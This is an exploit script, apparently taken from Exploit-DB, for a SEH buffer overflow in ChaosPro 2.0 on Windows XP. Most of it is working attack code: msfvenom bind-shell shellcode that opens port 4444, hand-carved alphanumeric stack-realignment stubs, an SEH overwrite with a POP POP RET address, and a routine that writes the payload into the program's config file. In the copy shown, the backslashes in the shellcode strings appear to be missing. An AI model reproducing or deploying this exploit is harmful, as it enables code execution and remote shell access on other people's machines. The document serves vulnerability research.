ChaosPro 2.0 – Buffer Overflow (SEH)
# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM
#!/usr/bin/env python2
import os, sys
# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705
# sploit = "A" * (2705 - 4 - 126) # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16
################ Second stage ####################
sploit = "A"*16
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh
#, BufferRegister=ESP -b "x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x69x6cx6bx58x6ex62x77x70"
"x75x50x57x70x71x70x6cx49x68x65x44x71x4bx70x50"
"x64x4ex6bx52x70x36x50x4cx4bx36x32x66x6cx4ex6b"
"x62x72x54x54x6ex6bx72x52x34x68x54x4fx6dx67x50"
"x4ax31x36x30x31x6bx4fx6cx6cx55x6cx71x71x31x6c"
"x53x32x76x4cx67x50x7ax61x48x4fx56x6dx33x31x6b"
"x77x58x62x4ax52x61x42x56x37x6ex6bx52x72x52x30"
"x4cx4bx71x5ax37x4cx4ex6bx32x6cx52x31x50x78x4b"
"x53x37x38x75x51x68x51x62x71x4cx4bx46x39x45x70"
"x53x31x68x53x4cx4bx51x59x64x58x4bx53x64x7ax63"
"x79x6cx4bx34x74x4cx4bx33x31x6bx66x36x51x49x6f"
"x6cx6cx7ax61x58x4fx64x4dx67x71x68x47x70x38x4b"
"x50x64x35x68x76x54x43x43x4dx58x78x67x4bx33x4d"
"x56x44x72x55x79x74x43x68x4cx4bx50x58x46x44x77"
"x71x58x53x65x36x4ex6bx44x4cx62x6bx4cx4bx32x78"
"x45x4cx33x31x6ax73x6cx4bx53x34x6ex6bx46x61x7a"
"x70x4bx39x72x64x57x54x61x34x51x4bx51x4bx35x31"
"x31x49x71x4ax32x71x69x6fx69x70x73x6fx61x4fx52"
"x7ax4cx4bx65x42x4ax4bx6ex6dx53x6dx65x38x75x63"
"x35x62x67x70x45x50x51x78x70x77x71x63x55x62x43"
"x6fx31x44x45x38x52x6cx43x47x65x76x43x37x49x6f"
"x58x55x68x38x6cx50x43x31x67x70x73x30x55x79x6f"
"x34x53x64x66x30x61x78x37x59x6bx30x52x4bx73x30"
"x49x6fx39x45x52x4ax53x38x51x49x46x30x39x72x49"
"x6dx67x30x42x70x71x50x66x30x63x58x48x6ax44x4f"
"x39x4fx59x70x4bx4fx4bx65x4ex77x51x78x37x72x73"
"x30x47x61x43x6cx6cx49x38x66x72x4ax76x70x52x76"
"x42x77x33x58x4bx72x69x4bx47x47x35x37x69x6fx5a"
"x75x63x67x31x78x6fx47x59x79x50x38x79x6fx59x6f"
"x6ex35x71x47x42x48x50x74x68x6cx47x4bx39x71x6b"
"x4fx49x45x73x67x4ex77x31x78x50x75x72x4ex62x6d"
"x61x71x49x6fx58x55x65x38x51x73x70x6dx33x54x47"
"x70x6bx39x7ax43x73x67x72x77x53x67x45x61x6ax56"
"x30x6ax32x32x46x39x51x46x6dx32x4bx4dx62x46x58"
"x47x61x54x47x54x57x4cx36x61x53x31x6cx4dx50x44"
"x44x64x56x70x69x56x57x70x53x74x71x44x62x70x42"
"x76x51x46x76x36x77x36x56x36x42x6ex36x36x50x56"
"x30x53x42x76x42x48x42x59x58x4cx37x4fx4bx36x69"
"x6fx59x45x4bx39x6bx50x42x6ex62x76x47x36x59x6f"
"x54x70x62x48x56x68x6dx57x65x4dx31x70x59x6fx7a"
"x75x6dx6bx49x6ex66x6ex75x62x39x7ax71x78x6ex46"
"x4ax35x4dx6dx6dx4dx79x6fx38x55x65x6cx57x76x31"
"x6cx47x7ax4dx50x79x6bx59x70x52x55x63x35x6fx4b"
"x31x57x37x63x44x32x42x4fx70x6ax35x50x51x43x69"
"x6fx39x45x41x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)
################ First stage ####################
# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32 54 PUSH ESP
# 0012FF33 58 POP EAX
# 0012FF34 66:05 3C18 ADD AX,183C
# 0012FF38 50 PUSH EAX
# 0012FF39 5C POP ESP
sploit += "x54x58x66x05x3cx18x50x5c" # 8
# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
# 0: 25 28 28 28 28 and eax,0x28282828
# 5: 25 47 47 47 47 and eax,0x47474747
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 7f 01 01 01 sub eax,0x101017f
# 14: 2d 03 18 3e 3e sub eax,0x3e3e1803
# 19: 50 push eax
sploit += (
"x25x28x28x28x28"
"x25x47x47x47x47"
"x2dx7fx01x7fx7f"
"x2dx7fx01x01x01"
"x2dx03x18x3ex3e"
"x50"
) # 26 bytes
## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54 44 INC ESP
# 0012FF55 44 INC ESP
# 0012FF56 44 INC ESP
# 0012FF57 44 INC ESP
# 0012FF58 44 INC ESP
# 0012FF59 44 INC ESP
# 0012FF5A 44 INC ESP
# 0012FF5B 44 INC ESP
sploit += "x44x44x44x44x44x44x44x44" # 8
## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
# 0: 25 02 02 02 02 and eax,0x2020202
# 5: 25 51 51 51 51 and eax,0x51515151
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 01 01 01 61 sub eax,0x61010101
# 14: 2d 64 08 6d 1f sub eax,0x1f6d0864
# 19: 50 push eax
sploit +=(
"x25x02x02x02x02"
"x25x51x51x51x51"
"x2dx7fx01x7fx7f"
"x2dx01x01x01x61"
"x2dx64x08x6dx1f"
"x50"
) # 26 bytes
## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C POP ESP
sploit += "x5c" # 1
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
################ RET from SEH: JMP SHORT - 126 ####################
sploit += "xebx80" + "x41x41" # 4
# 00401B44 |. 5F POP EDI
# 00401B45 |> 5E POP ESI
# 00401B46 . C3 RETN
sploit += "x44x1bx40x00"
################ build the config ####################
## Running from just outside base directory of ChaosPro:
def ret_cfg(inp):
# do it live in PicturePath
cfg = """PicturePath %s""" % inp
with open("chaosproChaosPro.cfg",'w') as F:
F.write(cfg)
F.close()
ret_cfg(sploit)
https://www.exploit-db.com/exploits/47551
Gloss